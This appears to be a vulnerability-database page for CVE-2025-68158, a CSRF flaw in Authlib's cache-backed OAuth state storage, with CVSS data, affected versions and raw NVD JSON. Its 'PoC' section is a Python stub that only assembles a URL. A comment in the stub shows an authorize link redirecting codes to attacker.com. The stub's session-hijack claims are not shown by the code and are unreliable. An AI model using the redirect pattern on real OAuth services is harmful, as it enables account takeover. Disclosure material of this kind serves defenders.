Security Vulnerability Report
中文
CVE-2025-68158 CVSS 5.7 MEDIUM

CVE-2025-68158

Published: 2026-01-08 18:15:59
Last Modified: 2026-03-30 13:16:22
Source: [email protected]

Description

Authlib is a Python library which builds OAuth and OpenID Connect servers. In versions 1.0.0 through 1.6.5, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under _state_{app}_{state}, and get_state_data ignores the caller’s session altogether. This issue has been patched in version 1.6.6.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:* - VULNERABLE
Authlib < 1.0.0 (不受影响)
Authlib 1.0.0 - 1.6.5 (受影响)
Authlib >= 1.6.6 (已修复)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import hashlib import hmac import base64 import json import time def generate_csrf_payload(attacker_state, target_redirect_uri): """ CVE-2025-68158 CSRF PoC Generate malicious OAuth state for CSRF attack Args: attacker_state: Valid state from attacker's own OAuth flow target_redirect_uri: Target application's OAuth callback URL Returns: Malicious redirect URL with CSRF payload """ # Attack scenario: Attacker initiates OAuth flow, gets valid state # Then tricks victim into completing auth with same state # Finally attacker uses the state to hijack victim's session payload = { 'attacker_state': attacker_state, 'target_redirect': target_redirect_uri, 'timestamp': int(time.time()) } # In real attack, the malicious URL would be: # https://target-oauth-server/authorize? # client_id=attacker_app& # redirect_uri=https://attacker.com/callback& # scope=openid profile email& # state={attacker_state}& # response_type=code malicious_url = f"{target_redirect_uri}?state={attacker_state}" return malicious_url, payload def exploit_vulnerability(attacker_oauth_flow_url): """ Exploit Authlib CSRF vulnerability Steps: 1. Attacker initiates OAuth flow to obtain valid state 2. Attacker crafts malicious link for victim 3. Victim clicks link and completes authentication 4. Attacker uses captured state to hijack session """ print("[*] CVE-2025-68158 Authlib CSRF Exploit") print(f"[*] Step 1: Initiate OAuth flow to get valid state") print(f"[*] URL: {attacker_oauth_flow_url}") # In vulnerable version, state is stored as: _state_{app}_{state} # without session binding cache_key_pattern = "_state_{app}_{state}" print(f"[*] Vulnerable cache key pattern: {cache_key_pattern}") print(f"[*] State is NOT bound to user session!") return True

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68158", "sourceIdentifier": "[email protected]", "published": "2026-01-08T18:15:59.060", "lastModified": "2026-03-30T13:16:21.587", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. In versions 1.0.0 through 1.6.5, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under _state_{app}_{state}, and get_state_data ignores the caller’s session altogether. This issue has been patched in version 1.6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.6", "matchCriteriaId": "7E0D5D7A-D21C-445C-83BA-4DD3C66C5A0E"}]}]}], "references": [{"url": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.